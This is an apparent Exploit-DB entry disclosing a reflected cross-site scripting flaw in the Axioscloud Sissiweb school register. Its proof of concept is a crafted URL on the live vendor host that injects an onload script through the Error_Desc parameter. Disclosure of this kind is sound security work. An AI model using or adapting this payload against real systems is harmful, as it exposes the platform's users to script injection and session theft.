Axioscloud Sissiweb Registro Elettronico 7.0.0 – ‘Error_desc’ Cross-Site Scripting

  • Author: Dino Barlattani
    Date: 2018-10-24
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/45668/
  • # Exploit Title: Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting
    # Dork: n/a
    # Date: 2018-10-11
    # Exploit Author: Dino Barlattani
    # Vendor Homepage: http://axiositalia.it/
    # Software Link: http://axiositalia.it/?page_id=1907
    # Version: 1.7.0/7.0.0
    # Category: Webapps
    # Platform: ASPX
    # CVE: N/A
     
    # POC:
    # https://family.axioscloud.it/secret/relogoff.aspx?Error_Desc=Sessione%20non%20Validaa%3Cbody%20onload=%22alert(%27ok%27);%22%3E&Error_Parameters=